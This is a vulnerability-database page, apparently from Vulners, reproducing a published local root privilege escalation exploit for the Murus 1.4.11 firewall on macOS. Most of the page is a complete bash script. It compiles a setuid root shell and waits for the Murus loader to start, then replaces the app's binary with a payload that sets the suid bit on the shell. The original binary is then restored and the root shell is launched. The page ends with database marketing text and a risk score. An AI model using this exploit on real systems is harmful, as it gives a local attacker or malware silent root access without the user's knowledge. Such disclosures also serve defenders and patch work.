Vulners
Lucene search
Murus 1.4.11 - Local root Privilege Escalation Exploit
# I recently blogged about the prevalence of escalation hijack vulnerabilities amongst macOS applications. One example of this is the latest version of Murus
# firewall. By design it requires the user to authenticate every time in order to obtain the access it needs to modify the firewall settings.
# If a local attacker or malware is running as an admin user (ie has write access to /Applications/) they can subvert this process to silently obtain root access
# without the user knowing.
# https://m4.rkw.io/murus1.4.11.sh.txt
# 9c332c07747e11c78c34f9dc8d30127250d95edd5e58a571ed1a005eafd32301
# -------------------------------------------------------------------------------
#!/bin/bash
##################################################################
###### Murus 1.4.11 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
##################################################################
echo "compiling payloads..."
cat > /tmp/murus411_exp.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash","bash","-c","rm -f /tmp/murus411_exp; /bin/bash",NULL);
return 0;
}
EOF
gcc -o /tmp/murus411_exp /tmp/murus411_exp.c
if [ ! $? -eq 0 ] ; then
rm -f /tmp/murus411_exp.c
echo "failed to compile, dev tools may not be installed"
exit 1
fi
rm -f /tmp/murus411_exp.c
cat > /tmp/murus411_exp2.c <<EOF
#include <unistd.h>
#include <stdlib.h>
int main()
{
setuid(0);
seteuid(0);
system("chown root:wheel /tmp/murus411_exp");
system("chmod 4755 /tmp/murus411_exp");
system("mv /Applications/Murus.app/Contents/MacOS/Murus.orig /Applications/\
Murus.app/Contents/MacOS/Murus");
execl("/Applications/Murus.app/Contents/MacOS/Murus","Murus",NULL);
return 0;
}
EOF
gcc -o /tmp/murus411_exp2 /tmp/murus411_exp2.c
rm -f /tmp/murus411_exp2.c
echo "waiting for loader..."
while :
do
ps auxwww |grep '/Applications/Murus.app/Contents/MacOS/MurusLoader' \
|grep -v grep 1>/dev/null
if [ $? -eq 0 ] ; then
break
fi
done
echo "planting payload..."
mv /Applications/Murus.app/Contents/MacOS/Murus /Applications/Murus.app/\
Contents/MacOS/Murus.orig
mv /tmp/murus411_exp2 /Applications/Murus.app/Contents/MacOS/Murus
echo "waiting for payload to trigger..."
while :
do
r=`ls -la /tmp/murus411_exp |grep root`
if [ "$r" != "" ] ; then
break
fi
sleep 0.1
done
echo "kapow"
/tmp/murus411_exp
# 0day.today [2018-04-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Dec 2017 00:00Current
6.8Medium risk
Vulners AI Score6.8